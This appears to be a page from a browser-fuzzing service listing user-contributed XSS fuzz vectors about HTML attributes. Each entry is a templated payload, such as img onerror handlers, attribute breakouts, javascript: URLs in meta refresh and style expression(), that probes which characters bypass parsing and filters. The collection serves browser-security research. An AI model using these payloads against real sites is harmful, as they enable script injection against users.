Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

3,422,532 Successful fuzzes

Fuzz Vectors

Searching for "attribute"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters between event handlers <img id="fuzz*num*" src=x onerro*chr*r='xx'> @salchoman
Characters that can go on either side of in attribute <!-- sample vector --> <img src onerror*chr*=*chr*logChr(*num*)> @Lamp_AE
Valid HTML Attribute Seperators <!-- sample vector --> <img*chr*src*chr*onerror=logChr(*num*)> @Lamp_AE
form attribute support <form id='*datahtmlelements*1'> </form> <*datahtmlelements* id='*datahtmlelements*2' form='*datahtmlelements*1'></*datahtmlelements*> <script> if (document.getElementById('*datahtmlelements*2').form == '[object HTMLFormElement]') { customLog('*datahtmlelements*') } </script> @insertScript
Single characters that break attribute names <div *chr*="><img src=xss:xss onerror=logChr(*num*)>"> @garethheyes
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes